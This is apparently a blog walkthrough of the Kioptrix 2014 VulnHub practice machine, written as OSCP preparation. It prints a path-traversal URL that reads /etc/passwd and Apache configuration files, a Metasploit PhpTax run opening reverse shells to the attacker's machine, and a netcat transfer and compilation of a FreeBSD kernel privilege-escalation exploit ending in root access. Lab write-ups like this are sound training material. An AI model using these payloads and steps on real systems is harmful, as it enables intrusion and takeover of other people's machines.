Kioptrix
This is the first in the list of VM’s that are hosted on [vulnhub](https://vulnhub.com) and are good to try on when preparing for the OSCP exam.
There are more to follow, but I’m starting with this one and it should be an easy one.
Recon
First off I need to know what ports are open and what services are running.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
┌──[root@n0w4n]─[~/vulnhub] └──╼ # nmap -n -v -T4 -sS -sV -sC -p- 192.168.50.133 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-27 15:47 CEST Host is up (0.00038s latency). PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 00:0C:29:64:61:C0 (VMware) NSE: Script Post-scanning. Initiating NSE at 15:47 Completed NSE at 15:47, 0.00s elapsed Initiating NSE at 15:47 Completed NSE at 15:47, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 26.63 seconds Raw packets sent: 4 (160B) | Rcvd: 4 (156B) |
It looks like there is a webserver running on port 80 and 8080. There is also a closed port.
In the nmap scan there is a notification on OpenSSL, but no port 443 is open. Also as we look at the version of Apache, we can see it is running on a FreeBSD system. This is important to keep in mind for system recon.
Webserver
When curling the webserver on port 80, I get:
|
1 |
When curling the webserver on port 8080, I get:
|
1 |
The comment in the first curl is a hint and it directs to the content of the actual webpage.
Google has this to say about pChart: *pChart is a PHP library that will help you to create anti-aliased charts or pictures directly from your web server.*
|
1 2 3 4 5 6 7 8 9 |
┌──[root@n0w4n]─[~/vulnhub] └──╼ # searchsploit pchart -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- pChart 2.1.3 - Multiple Vulnerabilities | exploits/php/webapps/31173.txt -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result |
When looking at the exploit, it seems that there is a path traversal vulnerability that may come in handy.
To see if it works, I’m going to get access to the
/etc/passwd file, which is a file that is available on almost every Unix distro.
|
1 |
http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5:System &:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin |
Looks like it works. 3 users, which you can tell by the UID from 1000 and up.
But these users can’t login > /sbin/nologin
There is also an extra superuser by the username of toor which has no shell assigned.
And root has a csh as default shell.
Because this is a FreeBSD distro you need to keep in mind that some files are stored differently than on Debian based distro’s.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/rc.conf hostname="kioptrix2014" ifconfig_em0="DHCP" sshd_enable="NO" # Set dumpdev to "AUTO" to enable crash dumps, "NO" to disable dumpdev="NO" apache22_enable="YES" mysql_enable="YES" firewall_enable="YES" firewall_script="/etc/ipfw.rules" ossechids_enable="YES" rc_debug="NO" monitor_enable="YES" |
Let’s look for the Apache configuration file. Because of the nmap scan, but also from the output above, I know I need to look for the apache22 location of the httpd.conf file.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
http://192.168.50.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf ...[SNIP]... # DocumentRoot: The directory out of which you will serve your # documents. By default, all requests are taken from this directory, but # symbolic links and aliases may be used to point to other locations. # DocumentRoot "/usr/local/www/apache22/data" ...[SNIP]... SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser <VirtualHost *:8080> DocumentRoot /usr/local/www/apache22/data2 <Directory "/usr/local/www/apache22/data2"> Options Indexes FollowSymLinks AllowOverride All Order allow,deny Allow from env=Mozilla4_browser </Directory> </VirtualHost> |
A the bottom I find some information about a virtualhost, namely port 8080.
It seems I need another browser agent. Let’s test this with curl first.
|
1 |
And now with the right agent.
|
1 |
And it works.
I end up at a webpage with some kind of income taxform.
But it runs php and the software is called phptax / pfilez.
|
1 2 3 4 5 6 7 8 9 10 11 |
┌──[root@n0w4n]─[~/vulnhub] └──╼ # searchsploit phptax ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit) | exploits/php/webapps/21833.rb PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution | exploits/php/webapps/25849.txt phptax 0.8 - Remote Code Execution | exploits/php/webapps/21665.txt ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result |
The first line looks promising.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 |
msf5 > search pfilez Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/phptax_exec 2012-10-08 excellent Yes PhpTax pfilez Parameter Exec Remote Code Injection msf5 > use exploit/multi/http/phptax_exec msf5 exploit(multi/http/phptax_exec) > options Module options (exploit/multi/http/phptax_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /phptax/ yes The path to the web application VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 PhpTax 0.8 msf5 exploit(multi/http/phptax_exec) > set rhosts 192.168.50.133 rhosts => 192.168.50.133 msf5 exploit(multi/http/phptax_exec) > set rport 8080 rport => 8080 msf5 exploit(multi/http/phptax_exec) > set lhost 192.168.50.130 lhost => 192.168.50.130 msf5 exploit(multi/http/phptax_exec) > exploit [*] Started reverse TCP double handler on 192.168.50.130:4444 [*] 192.168.50.1338080 - Sending request... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 2e2fcgbkJnIGuNf4; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Command: echo uWvGYkyY1ExTYAiC; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "2e2fcgbkJnIGuNf4\r\n" [*] Matching... [*] A is input... [*] Reading from socket B [*] B: "uWvGYkyY1ExTYAiC\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.50.130:4444 -> 192.168.50.133:64031) at 2019-05-27 16:59:36 +0200 [*] Command shell session 2 opened (192.168.50.130:4444 -> 192.168.50.133:54454) at 2019-05-27 16:59:36 +0200 id uid=80(www) gid=80(www) groups=80(www) |
Looks like I’m in the system.
After some time searchin the system it seems like a possible way to escalate my privileges is by running a kernel exploit.
|
1 2 |
$ uname -a FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 |
|
1 2 3 4 5 6 7 8 9 10 |
┌──[root@n0w4n]─[~/vulnhub/kioptrix] └──╼ # searchsploit freebsd 9.0 --------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) --------------------------------------------------------------- ---------------------------------------- FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation | exploits/freebsd/local/28718.c FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation | exploits/freebsd/local/26368.c --------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result |
Time to copy the exploit to the remote system.
First setting up a listener on my end and redirecting the file to stdin.
|
1 2 3 |
┌──[root@n0w4n]─[~/vulnhub/kioptrix] └──╼ # nc -lvnp 9999 < 26368.c listening on [any] 9999 ... |
Then connection to the listener and redirecting the file to stdout.
|
1 |
$ nc -w3 192.168.50.130 9999 > /tmp/exploit.c |
Now to compile the script and run it.
|
1 2 3 4 5 6 |
$ cd /tmp $ gcc exploit.c -o exploit exploit.c:89:2: warning: no newline at end of file $ ./exploit id uid=0(root) gid=0(wheel) egid=80(www) groups=80(www) |
Looks like it worked.
Time for the final step and retrieve the flag.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 |
# cd /root # ls -lah total 88 drwxr-xr-x 2 root wheel 512B May 27 09:19 . drwxr-xr-x 18 root wheel 1.0k Apr 6 2014 .. -rw-r--r-- 2 root wheel 793B Jan 3 2012 .cshrc -rw------- 1 root wheel 0B Apr 6 2014 .history -rw-r--r-- 1 root wheel 151B Jan 3 2012 .k5login -rw-r--r-- 1 root wheel 299B Jan 3 2012 .login -rw------- 1 root wheel 1B Mar 30 2014 .mysql_history -rw-r--r-- 2 root wheel 256B Jan 3 2012 .profile ---------- 1 root wheel 2.6k Apr 3 2014 congrats.txt -rw-r--r-- 1 root wheel 362B May 27 11:47 folderMonitor.log lrwxr-xr-x 1 root wheel 25B Mar 29 2014 httpd-access.log -> /var/log/httpd-access.log -rwxr-xr-x 1 root wheel 574B Apr 3 2014 lazyClearLog.sh -rwx------ 1 root wheel 2.3k Mar 28 2014 monitor.py lrwxr-xr-x 1 root wheel 44B Mar 29 2014 ossec-alerts.log -> /usr/local/ossec-hids/logs/alerts/alerts.log # cat congrats.txt If you are reading this, it means you got root (or cheated). Congratulations either way... Hope you enjoyed this new VM of mine. As always, they are made for the beginner in mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them. As with all my VMs, besides getting "root" on the system, the goal is to also learn the basics skills needed to compromise a system. Most importantly, in my mind, are information gathering & research. Anyone can throw massive amounts of exploits and "hope" it works, but think about the traffic.. the logs... Best to take it slow, and read up on the information you gathered and hopefully craft better more targetted attacks. For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly. Knowing the OS gives you any idea of what will work and what won't from the get go. Default file locations are not the same on FreeBSD versus a Linux based distribution. Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log". It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data". Finding and knowing these little details will greatly help during an attack. Of course my examples are specific for this target, but the theory applies to all systems. As a small exercise, look at the logs and see how much noise you generated. Of course the log results may not be accurate if you created a snapshot and reverted, but at least it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things. Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files: /root/folderMonitor.log /root/httpd-access.log (softlink) /root/ossec-alerts.log (softlink) The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS for this. The httpd-access.log is rather self-explanatory . Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain files. This one should've detected a few of your web attacks. Feel free to explore the system and other log files to see how noisy, or silent, you were. And again, thank you for taking the time to download and play. Sincerely hope you enjoyed yourself. Be good... loneferret http://www.kioptrix.com p.s.: Keep in mind, for each "web attack" detected by OSSEC-HIDS, by default it would've blocked your IP (both in hosts.allow & Firewall) for 600 seconds. I was nice enough to remove that part :) |